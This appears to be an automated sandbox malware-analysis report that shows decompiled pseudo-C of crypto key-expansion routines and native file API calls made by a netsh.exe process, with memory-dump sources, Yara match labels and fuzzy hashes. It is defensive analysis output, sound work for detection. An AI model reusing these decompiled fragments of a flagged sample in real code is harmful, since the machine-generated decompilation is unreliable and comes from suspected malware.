                                      0x0041d2c3
                                      0x0041d2c9
                                      0x0041d2d6
                                      0x0041d2e6
                                      0x0041d2ed
                                      0x0041d2f2
                                      0x0041d2f9
                                      0x0041d2fc
                                      0x0041d313
                                      0x0041d319
                                      0x0041d330
                                      0x0041d337
                                      0x0041d338
                                      0x0041d33f
                                      0x0041d347
                                      0x0041d34d
                                      0x0041d35a
                                      0x0041d362
                                      0x0041d36d
                                      0x0041d373
                                      0x0041d379
                                      0x0041d37f
                                      0x0041d386
                                      0x0041d38c
                                      0x0041d393
                                      0x0041d3a0
                                      0x0041d3a8
                                      0x0041d3a8
                                      0x0041d3ae
                                      0x0041d3b4
                                      0x0041d3c0
                                      0x0041d3c6
                                      0x0041d3f6
                                      0x0041d3f7
                                      0x0041d3f8
                                      0x0041d3fe
                                      0x0041d404
                                      0x0041d40a
                                      0x0041d40a
                                      0x0041d410
                                      0x0041d417
                                      0x0041d41d
                                      0x0041d423
                                      0x0041d429
                                      0x0041d433
                                      0x0041d439
                                      0x0041d449
                                      0x0041d44f
                                      0x0041d455
                                      0x0041d45b
                                      0x0041d45c
                                      0x0041d45d
                                      0x0041d464
                                      0x0041d46a
                                      0x0041d471
                                      0x0041d477
                                      0x0041d47e
                                      0x0041d484
                                      0x0041d494
                                      0x0041d49b
                                      0x0041d4a7
                                      0x0041d4ac
                                      0x0041d4b2
                                      0x0041d4b8
                                      0x0041d4be
                                      0x0041d4c5
                                      0x0041d4d2
                                      0x0041d4d3
                                      0x0041d4d6
                                      0x0041d4dc
                                      0x0041d4ed
                                      0x0041d4f3
                                      0x0041d47e
                                      0x0041d44f
                                      0x0041d433
                                      0x0041d2fc
                                      0x0041d2af
                                      0x0041d298
                                      0x0041d275
                                      0x0041d1dc
                                      0x00000000

                                      Memory Dump Source
                                      • Source File: 00000003.00000002.313036443.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 82bada17cfb35faf24a29be6280080d0dd467af857b3aa9e0039e93cc2ecbc75
                                      • Instruction ID: 380c0d0cc0030d7ebe0abdacbab9d6a90d6231e8d16c5d32f41c984d2cb02c87
                                      • Opcode Fuzzy Hash: 82bada17cfb35faf24a29be6280080d0dd467af857b3aa9e0039e93cc2ecbc75
                                      • Instruction Fuzzy Hash: 2E9196B2A14781DFEB15CF39D88AB403FB2F316320B14824ED591975A2C7783556CF89
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00402D90, Relevance: .2, Instructions: 165COMMONCrypto
                                      Download Yara Rule
                                      C-Code - Quality: 67%
                                      			E00402D90(intOrPtr _a4, signed int* _a8, signed int* _a12, intOrPtr _a16) {
				signed int _t66;
				signed int* _t69;
				signed int* _t81;
				signed int _t94;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int* _t110;
				signed int _t127;
				signed int _t129;
				signed int _t133;
				signed int _t152;
				intOrPtr _t171;

				_t81 = _a12;
				_t110 = _a8;
				asm("ror esi, 0x8");
				asm("rol eax, 0x8");
				 *_t110 =  *_t81 & 0xff00ff00 |  *_t81 & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[1] = _t81[1] & 0xff00ff00 | _t81[1] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[2] = _t81[2] & 0xff00ff00 | _t81[2] & 0x00ff00ff;
				_t66 =  &(_t110[1]);
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[3] = _t81[3] & 0xff00ff00 | _t81[3] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[4] = _t81[4] & 0xff00ff00 | _t81[4] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[5] = _t81[5] & 0xff00ff00 | _t81[5] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[6] = _t81[6] & 0xff00ff00 | _t81[6] & 0x00ff00ff;
				asm("ror esi, 0x8");
				asm("rol ecx, 0x8");
				_t110[7] = _t81[7] & 0xff00ff00 | _t81[7] & 0x00ff00ff;
				if(_a16 != 0x100) {
					L4:
					return _t66 | 0xffffffff;
				} else {
					_t171 = _a4;
					_t69 = 0;
					_a12 = 0;
					while(1) {
						_t152 =  *(_t66 + 0x18);
						_t94 = ( *(_t171 + 4 + (_t152 >> 0x00000010 & 0x000000ff) * 4) & 0xffff0000 ^ ( *(_t171 +  &(_t69[0x241])) & 0x000000ff) << 0x00000010) << 0x00000008 ^  *(_t171 + 4 + (_t152 >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t171 + 5 + (_t152 >> 0x00000018 & 0x000000ff) * 4) & 0x000000ff ^  *(_t171 + 4 + (_t152 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t66 - 4);
						_t127 =  *_t66 ^ _t94;
						 *(_t66 + 0x1c) = _t94;
						_t96 =  *(_t66 + 4) ^ _t127;
						 *(_t66 + 0x20) = _t127;
						_t129 =  *(_t66 + 8) ^ _t96;
						 *(_t66 + 0x24) = _t96;
						 *(_t66 + 0x28) = _t129;
						if(_t69 == 6) {
							break;
						}
						_t106 = ( *(_t171 + 4 + (_t129 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t171 + 4 + (_t129 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t171 + 4 + (_t129 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t171 + 5 + (_t129 & 0x000000ff) * 4) & 0x000000ff ^  *(_t66 + 0xc);
						_t133 =  *(_t66 + 0x10) ^ _t106;
						 *(_t66 + 0x2c) = _t106;
						_t108 =  *(_t66 + 0x14) ^ _t133;
						 *(_t66 + 0x34) = _t108;
						_t69 =  &(_a12[0]);
						 *(_t66 + 0x30) = _t133;
						 *(_t66 + 0x38) = _t108 ^ _t152;
						_t66 = _t66 + 0x20;
						_a12 = _t69;
						if(_t69 < 7) {
							continue;
						} else {
							goto L4;
						}
						goto L6;
					}
					return 0xe;
				}
				L6:
			}
















                                      0x00402d93
                                      0x00402d98
                                      0x00402da0
                                      0x00402da9
                                      0x00402db3
                                      0x00402dba
                                      0x00402dc3
                                      0x00402dce
                                      0x00402dd6
                                      0x00402ddf
                                      0x00402dea
                                      0x00402df0
                                      0x00402df5
                                      0x00402dfe
                                      0x00402e09
                                      0x00402e11
                                      0x00402e1a
                                      0x00402e25
                                      0x00402e2d
                                      0x00402e36
                                      0x00402e41
                                      0x00402e49
                                      0x00402e52
                                      0x00402e5d
                                      0x00402e65
                                      0x00402e6e
                                      0x00402e80
                                      0x00402e83
                                      0x00402f9f
                                      0x00402fa4
                                      0x00402e89
                                      0x00402e89
                                      0x00402e8c
                                      0x00402e8e
                                      0x00402e91
                                      0x00402e91
                                      0x00402ef6
                                      0x00402efb
                                      0x00402efd
                                      0x00402f03
                                      0x00402f05
                                      0x00402f0b
                                      0x00402f0d
                                      0x00402f10
                                      0x00402f16
                                      0x00000000
                                      0x00000000
                                      0x00402f72
                                      0x00402f78
                                      0x00402f7a
                                      0x00402f80
                                      0x00402f82
                                      0x00402f87
                                      0x00402f88
                                      0x00402f8b
                                      0x00402f8e
                                      0x00402f91
                                      0x00402f97
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00402f97
                                      0x00402fae
                                      0x00402fae
                                      0x00000000

                                      Memory Dump Source
                                      • Source File: 00000003.00000002.313036443.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
                                      • Instruction ID: 72940b2de139f4e90958e9e8763c4e4336f87cc22ae5d142da70f60c8c24c1bc
                                      • Opcode Fuzzy Hash: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
                                      • Instruction Fuzzy Hash: AB5173B3E14A214BD3188E09CD40631B792FFD8312B5F81BEDD199B397CE74E9529A90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00402D88, Relevance: .2, Instructions: 164COMMONCrypto
                                      Download Yara Rule
                                      C-Code - Quality: 63%
                                      			E00402D88(intOrPtr* __ebx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int* _v0;
				signed int _t68;
				intOrPtr _t73;
				signed int* _t86;
				signed int _t99;
				signed int _t101;
				signed int _t111;
				signed int _t113;
				signed int* _t115;
				signed int _t132;
				signed int _t134;
				signed int _t138;
				signed int _t159;
				signed int* _t181;

				_push(cs);
				asm("adc ebx, [eax]");
				 *__ebx();
				asm("insb");
				_t86 = _a4;
				_t115 = _v0;
				asm("ror esi, 0x8");
				asm("rol eax, 0x8");
				 *_t115 =  *_t86 & 0xff00ff00 |  *_t86 & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t115[1] = _t86[1] & 0xff00ff00 | _t86[1] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t115[2] = _t86[2] & 0xff00ff00 | _t86[2] & 0x00ff00ff;
				_t68 =  &(_t115[1]);
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t115[3] = _t86[3] & 0xff00ff00 | _t86[3] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t115[4] = _t86[4] & 0xff00ff00 | _t86[4] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t115[5] = _t86[5] & 0xff00ff00 | _t86[5] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t115[6] = _t86[6] & 0xff00ff00 | _t86[6] & 0x00ff00ff;
				asm("ror esi, 0x8");
				asm("rol ecx, 0x8");
				_t115[7] = _t86[7] & 0xff00ff00 | _t86[7] & 0x00ff00ff;
				if(_a8 != 0x100) {
					L5:
					return _t68 | 0xffffffff;
				} else {
					_t181 = _a4;
					_t73 = 0;
					_a12 = 0;
					while(1) {
						_t159 =  *(_t68 + 0x18);
						_t99 = ( *(_t181 + 4 + (_t159 >> 0x00000010 & 0x000000ff) * 4) & 0xffff0000 ^ ( *(_t181 + _t73 + 0x904) & 0x000000ff) << 0x00000010) << 0x00000008 ^  *(_t181 + 4 + (_t159 >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t181 + 5 + (_t159 >> 0x00000018 & 0x000000ff) * 4) & 0x000000ff ^  *(_t181 + 4 + (_t159 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t68 - 4);
						_t132 =  *_t68 ^ _t99;
						 *(_t68 + 0x1c) = _t99;
						_t101 =  *(_t68 + 4) ^ _t132;
						 *(_t68 + 0x20) = _t132;
						_t134 =  *(_t68 + 8) ^ _t101;
						 *(_t68 + 0x24) = _t101;
						 *(_t68 + 0x28) = _t134;
						if(_t73 == 6) {
							break;
						}
						_t111 = ( *(_t181 + 4 + (_t134 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t181 + 4 + (_t134 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t181 + 4 + (_t134 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t181 + 5 + (_t134 & 0x000000ff) * 4) & 0x000000ff ^  *(_t68 + 0xc);
						_t138 =  *(_t68 + 0x10) ^ _t111;
						 *(_t68 + 0x2c) = _t111;
						_t113 =  *(_t68 + 0x14) ^ _t138;
						 *(_t68 + 0x34) = _t113;
						_t73 = _a12 + 1;
						 *(_t68 + 0x30) = _t138;
						 *(_t68 + 0x38) = _t113 ^ _t159;
						_t68 = _t68 + 0x20;
						_a12 = _t73;
						if(_t73 < 7) {
							continue;
						} else {
							goto L5;
						}
						goto L7;
					}
					return 0xe;
				}
				L7:
			}

















                                      0x00402d88
                                      0x00402d89
                                      0x00402d8b
                                      0x00402d8d
                                      0x00402d93
                                      0x00402d98
                                      0x00402da0
                                      0x00402da9
                                      0x00402db3
                                      0x00402dba
                                      0x00402dc3
                                      0x00402dce
                                      0x00402dd6
                                      0x00402ddf
                                      0x00402dea
                                      0x00402df0
                                      0x00402df5
                                      0x00402dfe
                                      0x00402e09
                                      0x00402e11
                                      0x00402e1a
                                      0x00402e25
                                      0x00402e2d
                                      0x00402e36
                                      0x00402e41
                                      0x00402e49
                                      0x00402e52
                                      0x00402e5d
                                      0x00402e65
                                      0x00402e6e
                                      0x00402e80
                                      0x00402e83
                                      0x00402f9d
                                      0x00402fa4
                                      0x00402e89
                                      0x00402e89
                                      0x00402e8c
                                      0x00402e8e
                                      0x00402e91
                                      0x00402e91
                                      0x00402ef6
                                      0x00402efb
                                      0x00402efd
                                      0x00402f03
                                      0x00402f05
                                      0x00402f0b
                                      0x00402f0d
                                      0x00402f10
                                      0x00402f16
                                      0x00000000
                                      0x00000000
                                      0x00402f72
                                      0x00402f78
                                      0x00402f7a
                                      0x00402f80
                                      0x00402f82
                                      0x00402f87
                                      0x00402f88
                                      0x00402f8b
                                      0x00402f8e
                                      0x00402f91
                                      0x00402f97
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00402f97
                                      0x00402fae
                                      0x00402fae
                                      0x00000000

                                      Memory Dump Source
                                      • Source File: 00000003.00000002.313036443.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c857e77a185b07cae7b37cea1082dffe788ad6d99d8687bb06fff5f31975761e
                                      • Instruction ID: 86fb380c83e9a8aa4885f33cca16da49e433a2c8bb06a23184c7467d7cda56d3
                                      • Opcode Fuzzy Hash: c857e77a185b07cae7b37cea1082dffe788ad6d99d8687bb06fff5f31975761e
                                      • Instruction Fuzzy Hash: 065173B3E14A214BD318CF09CD40631B792EFD8312B5F81BADD199B397CE74E9529A90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00401030, Relevance: .1, Instructions: 108COMMONCrypto
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00401030(signed char* __eax) {
				signed char* _t37;
				unsigned int _t65;
				unsigned int _t73;
				unsigned int _t81;
				unsigned int _t88;
				signed char _t94;
				signed char _t97;
				signed char _t100;

				_t37 = __eax;
				_t65 = ((((__eax[0xc] & 0x000000ff) << 0x00000008 | __eax[0xd] & 0x000000ff) & 0x0000ffff) << 0x00000008 | __eax[0xe] & 0xff) << 0x00000007 | (__eax[0xf] & 0x000000ff) >> 0x00000001;
				_t94 = __eax[0xb];
				if((_t94 & 0x00000001) != 0) {
					_t65 = _t65 | 0x80000000;
				}
				_t37[0xc] = _t65 >> 0x18;
				_t37[0xf] = _t65;
				_t37[0xd] = _t65 >> 0x10;
				_t73 = ((((_t37[8] & 0x000000ff) << 0x00000008 | _t37[9] & 0x000000ff) & 0x0000ffff) << 0x00000008 | _t37[0xa] & 0xff) << 0x00000007 | (_t94 & 0x000000ff) >> 0x00000001;
				_t97 = _t37[7];
				_t37[0xe] = _t65 >> 8;
				if((_t97 & 0x00000001) != 0) {
					_t73 = _t73 | 0x80000000;
				}
				_t37[8] = _t73 >> 0x18;
				_t37[0xb] = _t73;
				_t37[9] = _t73 >> 0x10;
				_t81 = ((((_t37[4] & 0x000000ff) << 0x00000008 | _t37[5] & 0x000000ff) & 0x0000ffff) << 0x00000008 | _t37[6] & 0xff) << 0x00000007 | (_t97 & 0x000000ff) >> 0x00000001;
				_t100 = _t37[3];
				_t37[0xa] = _t73 >> 8;
				if((_t100 & 0x00000001) != 0) {
					_t81 = _t81 | 0x80000000;
				}
				_t37[4] = _t81 >> 0x18;
				_t37[7] = _t81;
				_t37[5] = _t81 >> 0x10;
				_t88 = (((_t37[1] & 0x000000ff) << 0x00000008 | _t37[2] & 0x000000ff) & 0x00ffffff | ( *_t37 & 0x000000ff) << 0x00000010) << 0x00000007 | (_t100 & 0x000000ff) >> 0x00000001;
				 *_t37 = _t88 >> 0x18;
				_t37[1] = _t88 >> 0x10;
				_t37[6] = _t81 >> 8;
				_t37[2] = _t88 >> 8;
				_t37[3] = _t88;
				return _t37;
			}











                                      0x00401030
                                      0x0040105b
                                      0x0040105d
                                      0x00401063
                                      0x00401065
                                      0x00401065
                                      0x00401071
                                      0x00401076
                                      0x0040107c
                                      0x004010ac
                                      0x004010ae
                                      0x004010b4
                                      0x004010ba
                                      0x004010bc
                                      0x004010bc
                                      0x004010cb
                                      0x004010d0
                                      0x004010d6
                                      0x00401101
                                      0x00401103
                                      0x00401109
                                      0x0040110f
                                      0x00401111
                                      0x00401111
                                      0x00401120
                                      0x00401128
                                      0x0040112b
                                      0x0040114f
                                      0x00401156
                                      0x0040115d
                                      0x00401169
                                      0x0040116c
                                      0x0040116f
                                      0x00401173

                                      Memory Dump Source
                                      • Source File: 00000003.00000002.313036443.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
                                      • Instruction ID: 9ce4faf4bd6c29c48d5e9242fd1ccb7de96948774e055271f7c113e60250bd75
                                      • Opcode Fuzzy Hash: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
                                      • Instruction Fuzzy Hash: 203180116596F10ED30E836D08BDA75AEC18E9720174EC2FEDADA6F2F3C0888408D3A5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006B51D1, Relevance: 7.7, Strings: 6, Instructions: 193COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.313075452.0000000000672000.00000002.00020000.sdmp, Offset: 00670000, based on PE: true
                                      • Associated: 00000003.00000002.313064796.0000000000670000.00000002.00020000.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID: % 9!$% 9$$% y $% y!$% y"$% y#
                                      • API String ID: 0-710238550
                                      • Opcode ID: 1b7bed764a5fdbde622fc9a6f02e6743aeacbf28e8831917787535a2679568fa
                                      • Instruction ID: 737910c58ea82b35c40b25b571c726ff05c7e3dce81d4cdc90e47160b7ee2dc9
                                      • Opcode Fuzzy Hash: 1b7bed764a5fdbde622fc9a6f02e6743aeacbf28e8831917787535a2679568fa
                                      • Instruction Fuzzy Hash: 25710E974AEBC12FC3035B30AC752403F239D2B219B5E42EBE4D5CB693D318952AD326
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006B53D4, Relevance: 7.7, Strings: 6, Instructions: 157COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.313075452.0000000000672000.00000002.00020000.sdmp, Offset: 00670000, based on PE: true
                                      • Associated: 00000003.00000002.313064796.0000000000670000.00000002.00020000.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID: % 9$$% 9%$% 9&$% 9'$% y%$% y&
                                      • API String ID: 0-3278399253
                                      • Opcode ID: 2675688d4f2fcfed4c9d470fe5faf6e4d09b1d26df88473ea3fa52c1046a1fc1
                                      • Instruction ID: 9003a6a82f25aa0ef2d2486df6380dee1ddc1d11cbed04c39255a1404af04fbf
                                      • Opcode Fuzzy Hash: 2675688d4f2fcfed4c9d470fe5faf6e4d09b1d26df88473ea3fa52c1046a1fc1
                                      • Instruction Fuzzy Hash: 7851D59749EBC22ED3035BB0AC762503F239D2B214B5E42D7D4D5CB5A3E31C892AD326
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Analysis Process: netsh.exe PID: 6964 Parent PID: 3388 netsh.exeCOMMON

                                      Executed Functions

                                      Function 02DC9F2B, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41filenativeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • NtCreateFile.NTDLL(00000060,00000000,.z`,02DC4B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02DC4B87,007A002E,00000000,00000060,00000000,00000000), ref: 02DC9F7D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.483171472.0000000002DB0000.00000040.00000001.sdmp, Offset: 02DB0000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID: .z`
                                      • API String ID: 823142352-1441809116
                                      • Opcode ID: a12944e7550806664dbc90a0079927a8bb1aabd1427a4d6b409442210ab129df
                                      • Instruction ID: 790c965bb9b10573032b6d09744f2cc7b8363374523c3403160d930b5f0f5a15
                                      • Opcode Fuzzy Hash: a12944e7550806664dbc90a0079927a8bb1aabd1427a4d6b409442210ab129df
                                      • Instruction Fuzzy Hash: 9F01A4B2215208ABCB48CF88DC95EEB37E9AF8C754F158248FA0997240D630E8118BA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 02DC9F30, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • NtCreateFile.NTDLL(00000060,00000000,.z`,02DC4B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02DC4B87,007A002E,00000000,00000060,00000000,00000000), ref: 02DC9F7D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.483171472.0000000002DB0000.00000040.00000001.sdmp, Offset: 02DB0000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID: .z`
                                      • API String ID: 823142352-1441809116
                                      • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                      • Instruction ID: 1f62edf2ea405b47fecf35a328f529ecfbc324b651dcca931dbd7270ae1c499a
                                      • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                      • Instruction Fuzzy Hash: 21F0B6B2211108ABCB08CF88DC94EEB77ADAF8C754F158248BA0D97240C630E8118BA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 02DC9FDA, Relevance: 1.5, APIs: 1, Instructions: 39filenativeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • NtReadFile.NTDLL(02DC4D42,5EB6522D,FFFFFFFF,02DC4A01,?,?,02DC4D42,?,02DC4A01,FFFFFFFF,5EB6522D,02DC4D42,?,00000000), ref: 02DCA025
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.483171472.0000000002DB0000.00000040.00000001.sdmp, Offset: 02DB0000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: FileRead
                                      • String ID:
                                      • API String ID: 2738559852-0
                                      • Opcode ID: 73e1c481d8aab73a839e197903bb18d2e53b7e2fd7660915ca0c90bb7a6af5a6
                                      • Instruction ID: 24f861c3b2a5e4d06f601e284a159cfa7367a114b3b2e0c2f531e39d933c6572
                                      • Opcode Fuzzy Hash: 73e1c481d8aab73a839e197903bb18d2e53b7e2fd7660915ca0c90bb7a6af5a6
                                      • Instruction Fuzzy Hash: B7F0FFB2200108AFCB14CF99DC95EEB77A9EF8C354F158248BE0DD7245DA30E811CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 02DC9FE0, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • NtReadFile.NTDLL(02DC4D42,5EB6522D,FFFFFFFF,02DC4A01,?,?,02DC4D42,?,02DC4A01,FFFFFFFF,5EB6522D,02DC4D42,?,00000000), ref: 02DCA025
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.483171472.0000000002DB0000.00000040.00000001.sdmp, Offset: 02DB0000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: FileRead
                                      • String ID:
                                      • API String ID: 2738559852-0
                                      • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                      • Instruction ID: 9ec85e113766f957807fa68eb4265e2e2b3f4356412fe5a30991239df9e919c3
                                      • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                      • Instruction Fuzzy Hash: B4F0A9B2210108ABCB14DF89DC90EEB77ADEF8C754F158248BA1D97241D630E8118BA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 02DCA060, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • NtClose.NTDLL(02DC4D20,?,?,02DC4D20,00000000,FFFFFFFF), ref: 02DCA085
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.483171472.0000000002DB0000.00000040.00000001.sdmp, Offset: 02DB0000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: Close
                                      • String ID:
                                      • API String ID: 3535843008-0
                                      • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                      • Instruction ID: e8307455b74ae5c7bc11e1960ac28c2064fee88ae6aeece6c4d74cb24fa63407
                                      • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                      • Instruction Fuzzy Hash: D7D012752002146BD710EF98CC45F97775DEF44750F154559BA185B241C530F90086E0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 02DCA05B, Relevance: 1.5, APIs: 1, Instructions: 19nativeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • NtClose.NTDLL(02DC4D20,?,?,02DC4D20,00000000,FFFFFFFF), ref: 02DCA085
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.483171472.0000000002DB0000.00000040.00000001.sdmp, Offset: 02DB0000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: Close
                                      • String ID:
                                      • API String ID: 3535843008-0
                                      • Opcode ID: 6f6cfded8a9234303e018d3d311454c41d16a50ad1a5ba7bca7fe3ff98f5a0d4
                                      • Instruction ID: 58bfbb3bc791eaf8fcbe56a84a970c29d4725b9dc17e0b13cd7aaefffca78369
                                      • Opcode Fuzzy Hash: 6f6cfded8a9234303e018d3d311454c41d16a50ad1a5ba7bca7fe3ff98f5a0d4
                                      • Instruction Fuzzy Hash: 3BD02BA940D3C40FC720EEB465D3083BF41EF41214B245B8FD4D40B303D124961953D1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 03709710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 5cf72eddcf8b12ab0c0616eadc45317520c408a212de5a1584813877c248a54d
                                      • Instruction ID: 4ce78b971cb306d810920bc0299d20f6421b47f2d3a1dedbfaf3d540162889c7
                                      • Opcode Fuzzy Hash: 5cf72eddcf8b12ab0c0616eadc45317520c408a212de5a1584813877c248a54d
                                      • Instruction Fuzzy Hash: 6C90027220105806E210A99D5408656044597E4341F51D421A5015555EC7A588A17571
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 03709FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 745da8a9b57b23153a64fe16c1409e62d753b597ddc6777c020d38320b589160
                                      • Instruction ID: a64c4f1d9fb7f2f333f173e26ba636ea50566128b15e5d6919995e2ad81424a5
                                      • Opcode Fuzzy Hash: 745da8a9b57b23153a64fe16c1409e62d753b597ddc6777c020d38320b589160
                                      • Instruction Fuzzy Hash: 1C90027231119806E220A55D8404716044597D5241F51C821A0815558D87D588A17562
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 03709780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 0960d2621d091bf82f7500d82e3157d72084ed0cf75db69b52260aa099e1ffb4
                                      • Instruction ID: 91b2ea1755d7c4db1aeb9aa63a71d0aca1e6330fe50988fa8e579b0af676751e
                                      • Opcode Fuzzy Hash: 0960d2621d091bf82f7500d82e3157d72084ed0cf75db69b52260aa099e1ffb4
                                      • Instruction Fuzzy Hash: 3490026A21305406E290B55D540861A044597D5242F91D825A0006558CCA5588797761
                                      Uniqueness

